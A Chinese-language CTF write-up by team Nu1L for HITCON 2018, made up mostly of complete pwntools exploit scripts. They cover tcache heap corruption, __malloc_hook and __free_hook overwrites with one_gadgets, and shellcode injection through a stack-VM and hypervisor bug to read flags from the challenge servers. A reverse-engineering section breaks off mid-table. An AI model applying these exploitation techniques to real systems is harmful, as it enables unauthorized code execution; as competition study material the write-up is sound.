2018 hitcon CTF

By Nu1L

比赛网址:https://ctf2018.hitcon.org/
比赛时间:2018/10/20 02:00 UTC ~ 2018/10/22 02:00 UTC


PWN

children tcache

from pwn import *
#p=process('./child',env={'LD_PRELOAD':'./libc.so.6'})
p=remote('54.178.132.125', 8763)
libc = ELF('./libc.so.6')
def add(size,data):
    p.recvuntil('choice')
    p.sendline('1')
    p.recvuntil('Size:')
    p.sendline(str(size))
    p.recvuntil('Data:')
    p.send(data)

def dele(index):
    p.recvuntil('choice')
    p.sendline('3')
    p.recvuntil('Index')
    p.sendline(str(index))

for i in range(7):
    add(0x80,'xxx\n')
for i in range(7):
    dele(i)

for i in range(7):
    add(0x110-8,'xxx\n')

add(0x110-8,'aaaa\n')#7
add(0x100,'bbbb\n')#8
add(0x100,'cccc\n')#9

for i in range(7):
    dele(i)

dele(8)
dele(7)

#raw_input()
for i in range(7):
    add(0x110-8,'aaaa\n') #0-6
add(0x110-8,'a'*(0x110-8))#7
for i in range(7):
    dele(i)
#raw_input()
for i in range(7):
    add(0x80,'1234567\n')#0-6

add(0x80,'xxxxxxxx\n')#8

for i in range(7):
    dele(i)

add(0x60,'ABCD\n')#0

dele(8)
dele(9)
add(0x40,'a\n')#1
add(0x30,'b\n')#2
add(0x500,'aaaa\n')#3
add(0x120,'bbbb\n')#4
#0,3->same chunk
dele(3)
p.recvuntil('choice')
p.sendline('2')
p.recvuntil("Index:")
p.sendline('0')
addr = u64(p.recv(6).ljust(8,'\x00'))
libc_base = addr - (0x00007f2e9c12dca0-0x7f2e9bd42000)
info("libc:0x%x",libc_base)
malloc_hook = libc_base+libc.symbols['__malloc_hook']
info("malloc hook:0x%x",malloc_hook)
one = libc_base + 0x10a38c
add(0x500,'aaaaa\n')#3
dele(3)
add(0x120,'ABCDABCD\n')
dele(4)
dele(3)
dele(0)
add(0x120,p64(malloc_hook)+'\n')

add(0x120,p64(one)+'\n')
add(0x120,p64(one)+'\n')

p.sendline('1')
p.sendline('304')
p.interactive()

Groot

指针未初始化

#!/usr/bin/env python2
# coding:utf-8
from pwn import *
import os

VERBOSE = 1
DEBUG   = 1
LOCAL   = 0

target = 'groot'
libc   = []         # 加载指定libc
break_points = []
remote_addr = '54.238.202.201'
remote_port = 31733

def hint(break_points=[]):
    if LOCAL:
        out = 'gdb attach ' + str(pwnlib.util.proc.pidof(target)[0])
        for bp in break_points:
            out += " -ex 'b *{}'".format(hex(bp))
        raw_input(out+" -ex 'c'\n" if break_points else out+"\n") 
# if libc:
#     elf = ELF(libc[0])
#     gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64')))

if LOCAL:
    if libc:
        for libc_ in libc:
            os.environ['LD_PRELOAD'] = os.environ['PWD'] + '/' + libc_ + ':'
    p = process('./'+target)
    if DEBUG:
        out =  'gdb attach ' + str(pwnlib.util.proc.pidof(target)[0])
        for bp in break_points:
            out += " -ex 'b *{}'".format(hex(bp))
        raw_input(out+" -ex 'c'\n" if break_points else out+"\n")
else:
    p = remote(remote_addr,remote_port)

if VERBOSE: context.log_level = 'DEBUG'



def mkdir(dir):
    p.sendlineafter('$ ','mkdir '+dir)

def touch(name):
    p.sendlineafter('$ ','touch '+name)

def rm(name):
    p.sendlineafter('$ ','rm '+name)

def mkfile(name, content):
    p.sendlineafter('$ ','mkfile '+name)
    p.sendlineafter('Content?', content)

def cd(dir):
    p.sendlineafter('$ ','cd '+dir)

def ls(dir):
    if dir:
        p.sendlineafter('$ ','ls '+dir)
    else:
        p.sendlineafter('$ ','ls')

def mv(src, dst):
    p.sendlineafter('$ ','mv %s %s' %(src,dst))

def exp(cmd=None):

    mkdir('A'*0x30)
    cd('A'*0x30)
    touch('B'*0x30)
    cd('..')
    rm('A'*0x30)
    touch('X')
    touch('C'*0x30)
    rm('X')
    ls('')
    p.recv(0x14)
    heap = u64(p.recv(6).ljust(8,'\x00'))
    print hex(heap)
    heap_base = heap - 76864
    print hex(heap_base)

    rm(p64(heap))
    # raw_input()
    ls(p64(heap_base+0x11fd0)[:-2])
    # raw_input()
    for i in range(4):
        ls('HEHE')
    # raw_input()
    ls('A'*8+p16(0x561))
    rm('/etc/passwd')
    ls('/')
    ls('/')
    ls('/')
    p.recvuntil('dev')
    p.recv(0x10)
    libc = u64(p.recv(6).ljust(8,'\x00'))
    print hex(libc)
    libc_base = libc - 0x789ca0
    print hex(libc_base)

    # raw_input()
    for i in range(2):
        ls('D'*0x30)
    # raw_input()
    rm('/dev')

# add bin sh
    # ls('')
    mv('HEHE','sh')
    # mv('/bin/id','/bin/sh')
    # cd('../../../../../../../../../../../bin')

    for i in range(9):
        ls('D'*0x60)
    # ls('E'*0x40)
    # ls('E'*0x40)
    rm('/boot')

    ls('E'*0x40)

    # raw_input('hehehe')
    free_hook = 7911656 + libc_base
    malloc_hook = 0x789c30 + libc_base
    magic = 0x4f440 + libc_base + 3792896
    ls('X'*0x40+p64(heap_base+0x50-0x28))
    ls('D'*0x30)
    # raw_input('sending free hook')
    # ls(p64(free_hook-0x28)[:-2])

    # raw_input()
    print hex(magic)
    print hex(free_hook)
    rm('A'*0x28+p64(free_hook))


    # mkdir('../../../../../../../../../../../../../../bin/sh')
    # mv('/bin/id',p64(magic))
    ls(p64(magic))
    p.recvrepeat(1)
    # raw_input()
    p.sendline('rm ' + '../'*8+'home/groot/sh')
    # raw_input()
    # ls('123')



    # mkdir('ttt')
    # cd('ttt')

    # for i in range(10):
    #     mkdir(str(i)*0x30)
    # mkdir('C'*0x30)
    # cd('C'*0x30)
    # touch('A'*0x30)
    # cd('..')
    # rm('C'*0x30)


    # touch()


    p.interactive()


if __name__ == '__main__':
    exp("id")

Abyss I

是个堆栈机VM
swap 没有边界检查,可以越界到machine

把machine盖成负数,可以向上写got表
输入中放入shellcode,改shellcode跳过去即可

from pwn import *

p = remote('35.200.23.198', 31733)
context(arch = 'amd64', os = 'linux')
context.aslr = False
#p = process('./user.elf')
#gdb.attach(p)

#p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split(' '))
payload = '4294967295\\'
payload += '%' * ((0x2020a0 - 0x202030) / 4 - 2)
payload += '0:'
payload += '1:'
payload += '%%%%1;'
payload += str(0x2030A4 + 0x100 - 0x7b6) + '+'

# payload += str(0x7BEC0 - 0x4f322) + '\x011'
# payload += ';-'
# payload += '0;'
# payload += '.'
payload += '0;'
payload += ','
payload = payload.ljust(0x100, '\x01')
payload += asm(shellcraft.amd64.linux.open('flag', 0, 0))
payload += asm(shellcraft.amd64.linux.read(3, 'rsp', 0x100))
payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 0x100))
p.sendline(payload)
p.interactive()

Abyss II

系统调用号对应的处理函数(大概)

(0, '0x239L') read
(1, '0xa9aL') write
(2, '0x972L') open
(3, '0xf4bL') 
(5, '0x1caL')
(9, '0xc47L')
(10, '0x17b2L')
(11, '0xd54L')
(12, '0xbc6L')
(20, '0xb0dL')
(21, '0xa4cL')
(60, '0x966L')
(158, '0xb87L')
(221, '0x195L')
(231, '0x966L')
(257, '0xa39L')

write_sys 应该可以溢出。。。。试一试
让buf的地址加上size溢出到一个很小的数应该就可以过那个检查
kmalloc很大的数的时候会返回0,看了一下hypervisor似乎image base也是0,大概可以覆盖代码

hypervisor还有个蜜汁验证

已经能成功执行shellcode了,还需要逆一下串口的交互,手写一下open,read和write

from pwn import *
import time
context(arch = 'amd64', os = 'linux')
context.aslr = False



def runshellcode(p, s):
    payload = '4294967295\\'
    payload += '%' * ((0x2020a0 - 0x202030) / 4 - 2)
    payload += '0:'
    payload += '1:'
    payload += '%%%%1;'
    payload += str(0x2030A4 + 0x100 - 0x7b6) + '+'
    payload += '0;'
    payload += ','
    payload = payload.ljust(0x100, '\x01')
    payload += asm('push 0x61616161')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 0x4))
    payload += asm(shellcraft.amd64.linux.read(0, 'rsp', 0x1000))
    payload += asm('jmp rsp')
    p.sendline(payload)
    p.recvuntil('aaaa')
    p.send(s)
    context.log_level = 'debug'

def main():
    p = remote('35.200.23.198', 31733)
    #p = process('./user.elf')
    #p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split(' '))
    payload = ''

    mmap_addr = 0x500000
    payload += asm(shellcraft.amd64.linux.mmap(mmap_addr, 0x10000, 7, 16, -1, 0))
    payload += asm('push rax')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 8))
    payload += asm(shellcraft.amd64.linux.read(0, mmap_addr, 0x10000))
    payload += asm(shellcraft.amd64.linux.write(1, mmap_addr, 0x10000000000000000 - mmap_addr + 0x300000))
    payload += asm('push rax')
    payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 8))
    runshellcode(p, payload)

    time.sleep(10)
    payload = 'flag2'.ljust(8, '\x00')
    payload += p64(3) + p64(0x100) + p64(0x100)
    payload += p64(1) + p64(0x100) + p64(0x100)
    payload = payload.ljust(0xa5d, '\x90') + '\x90'*36
    payload += asm('''
    mov dx, 0x8000
    mov eax, 0x0
    ''')
    payload += '\xef\xed'
    payload += asm('''
    mov dx, 0x8001
    mov eax, 0x8
    ''')
    payload += '\xef\xed'
    payload += asm('''
    mov dx, 0x8002
    mov eax, 0x20
    ''')
    payload += '\xef\xed'
    payload += '\xeb\xfe'
    payload = payload.ljust(0xadb, '\x90')
    payload += '\xeb\x80'
    p.send(payload)
    p.interactive()    

if __name__ == '__main__':
    main()

Super Hexagon | solved 1, stuck 2 | pzhxbz

第一层

scanf里面似乎有一个溢出,可以覆盖函数指针

Reverse

EOP

感觉是用c++的异常处理机制实现的一个像控制流平坦化的东西。。。。

使用gdb script进行跟踪

b *(0x8000000+0x5620)
python f = open('log','w')
run < test_input
set $ipx=1
while ($ipx)
  python a = hex(gdb.parse_and_eval("$rax"))
  python f.write(a+'\n')
  continue
end

可以拿到程序的调用函数顺序,大致分析之后发现程序大概为3个循环对用户输入进行加密

大致分析后可以发现中间很多代码都是一样的,猜测是一个循环被拆分出来的结果。

于是半猜半蒙的一步一步还原算法 orz

还原之后的算法如下:

from pwn import *

index_table1 = [1448535819,1128528919,3149608817L,134807173,3570665939L,3806473211L,2728570142L,1936927410,3014904308L,757936956,2358043856L,3082270210L,2374833497L,101119117,2324303965L,3166450293L,3334870987L,3486456007L,2593817918L,2863289243L,1296954911,3941258622L,1212708960,3772817536L,774785486,1061104932,3284375988L,336915093,4227576212L,1970658879,4210704413L,3907542533L,3469666638L,791656519,555856463,1600120839,1953771446,3318050105L,3739122733L,1246425883,3924406156L,3048553849L,2004309316,2981184143L,117900548,2913818271L,1347425158,1162152090,4075994776L,3452801980L,1802191188,3368558019L,2526413901L,1717973422,3099086211L,320073617,3267520573L,2459073467L,690572490,2947538404L,3200170254L,960092585,993743570,623234489,4042274275L,1330609508,707409464,4261233945L,2644344890L,3520169900L,3553823959L,2341200340L,3065399179L,33721211,1145370899,2678000449L,3789639945L,1094809452,1819034704,825304876,505323371,454758676,2560101957L,1549570805,589510964,3991785594L,370565614,4244419728L,2240146396L,3974898163L,2391699371L,724289457,1313770733,185304183,2543318468L,1482222851,842161630,1195869153,16904585,2930650221L,3840204662L,2122209864,2442199369L,4160172263L,2021174981,2577006540L,1835906521,2779097114L,2223250005L,3604382376L,4143366510L,1633760426,202146163,2071712823,875866451,1532729329,1280051094,3722249951L,0,421108335,2088554803,2475919922L,2896996118L,252705665,4126522268L,2139073473,1027450463,404253670,606354480,3132802808L,1229556201,2509602495L,1650609752,572704957,976921435,3031747824L,3537042782L,4025441025L,2408554018L,3755969956L,2745392279L,2273796263L,488498585,2610656439L,2307484335L,1515873912,3654908201L,2711738348L,286352618,522153698,4294954594L,2661219016L,1077970661,3705468758L,640071499,1431674361,1397975412,353704732,2812748641L,1566401404,3250655951L,2425417920L,3385453642L,1381144829,2694850149L,3435946549L,741130933,2172752938L,4278075371L,673758531,943204384,387420263,1499012234,67403766,3351766594L,3873854477L,269522275,3823360626L,1987486925,1010587606,3115957258L,1886408768,3671720923L,2155898275L,168457726,1044307117,2627498419L,3958056183L,3638069408L,909517352,84250239,1785376989,1179021928,808507045,1263207058,1667481553,3688624722L,2256965934L,859024471,437969053,3233866566L,1903272393,1414818928,1852755755,4177054566L,656885442,2290653990L,2189618904L,2492763958L,1616954659,3587569754L,3503322661L,1465325186,538985414,3890718084L,2964370182L,1111625118,2037997388,2105352378,2829637856L,3301219504L,2762234259L,1734852647,235801096,2880152082L,1920129851,3183330300L,3402274488L,218984698,4193860335L,1364320783,4059153514L,1768540719,4109650453L,892688602,471602192,4008618632L,926405537,2054825406,50559730,3621221153L,1701137244,151588620,3857002239L,3419105073L,1751661478,1684323029,2998024317L,4092808977L,3216984199L,2206408529L,303177240,2795950824L,1583225230,2846435689L,1869561506]
index_table2 = [67438343,1346661484,3474112961L,1136470056,1858205430,1427801220,1604730173,4240686525L,3371867806L,1618495560,1593692882,628543696,132669279,2381579782L,895667404,561240023,3190127226L,4173773498L,2808121223L,3460902446L,3932426513L,1548445029,714375553,4106859443L,247054014,2317113689L,1819754817,943073834,3236991120L,4213957346L,3865778200L,2472125604L,1764338089,2648709658L,847942547,269753372,1413573483,1937837068,2714974007L,3985395278L,2005142283,2140013829,2180714255L,2086886749,3607942099L,3730649650L,1292146326,357233908,1805590046,2673257901L,3273509064L,2629563893L,2269691839L,1537423930,1158584472,1009986861,2202908856L,1030275778,2539430819L,2788911208L,3407333062L,2292903662L,3906119334L,156361185,3772295336L,2693322968L,2894582225L,4135519236L,4281263589L,1791291889,1966259388,424017405,3259377447L,3596041276L,2249412688L,3571551115L,1281325433,2494692347L,3450107510L,1337073953,3663213877L,1872369945,2100867762,606945087,2581929245L,3439303065L,2651669058L,134876686,2182502231L,2448364307L,2427780348L,1685933903,3973554593L,180140473,0,828885963,3518980963L,471536917,335103044,3096890058L,3316545656L,2722000751L,1926947811,1886147668,580816783,1091280799,3528604475L,536235341,1470903091,3674462938L,1403597876,2336732854L,1657733119,112439472,468929098,2517060684L,4201647373L,447260069,1629726631,1831644846,1203253039,3145437842L,2989126515L,2963064004L,1048943258,1361019779,3850780736L,4039947444L,2515145748L,3719326314L,1994384612,2942994825L,2922473062L,4269083146L,1189331136,3504639116L,1481532002,600137824,915379348,1724643576,673330742,1004237426,3918088521L,1494584717,3249241983L,2034087349,1737496343,2827146966L,981507485,4254618194L,4120009820L,3304429463L,2876214926L,2060512749,3382800753L,2449623883L,2605951658L,2360338921L,2127948522,199710294,2849585465L,3741769181L,1670713360,3029976003L,1071543669,4013619705L,1561365130,647727240,3878746103L,2855559521L,735014510,1146451831,1270294054,2072707586,45529015,1213890174,809247780,336665371,2760761311L,2741338240L,3839733679L,514695842,781289094,402408259,1224839569,3163803085L,1899477947,1752319558,2982619947L,2158026976L,202311945,380087468,2314273025L,1697030304,3706422661L,2916892222L,65886296,3117229349L,2562650866L,2403512753L,312650667,1391647707,3077872539L,876159779,4053228379L,3049401388L,1323945678,1526257109,539506744,801794409,2782277680L,1122420679,740766001,666920807,22802415,90106088,869366908,3326287904L,3393988905L,1079013488,290452467,3946839806L,4187837781L,2225465319L,3999340054L,1459084508,3783477063L,3212744085L,2248017928L,3340292047L,4068082435L,3585762404L,3811963120L,763158238,404623890,1953059667,1257032137,3639509634L,2384027230L,3122691453L,695851481,2584233285L,963495365,3652545901L,490797818,3056563316L,936672123,2019973722,3798867743L,4079086828L,4146392043L,3184009762L,3010567324L,3540636884L,266490193,223667942]
index_table3 = [3188637369L,582820552,701114700,4220844977L,1243302643,2083749073,4237360308L,274927765,1468159766,1029651878,1293897206,3161832498L,1722705457,1730635712,1125598204,1117667853,3815957466L,1443583719,2167046548L,3554136844L,354161947,1167738120,92210574,1059340077,2663948026L,4009881435L,446503648,2026207406,1941074730,3213344584L,3251618066L,1097613687,1586388505,607134780,3104487868L,3832997087L,83231871,2953228467L,1872916286,1612931269,1331974013,3884246949L,2345962465L,2469565322L,675489981,3492139126L,3095640141L,1442403741,3062609479L,3368273949L,3570652169L,733031367,192351108,1568431459,3377121772L,1542544279,510336671,2284226715L,3892701278L,3426077794L,1883271248,3517763975L,2554697742L,3136862918L,2546243573L,1649959502,1909027233,66192250,1674666943,4246338885L,2109373728,2309982570L,4159174448L,3044652349L,2275903328L,2671877899L,1003633490,1088766086,933312467,3918326191L,3308897645L,384702049,3601389186L,2716639703L,750070978,4120704443L,1792895664,1800694593

       
       
       

    

Hacking more

...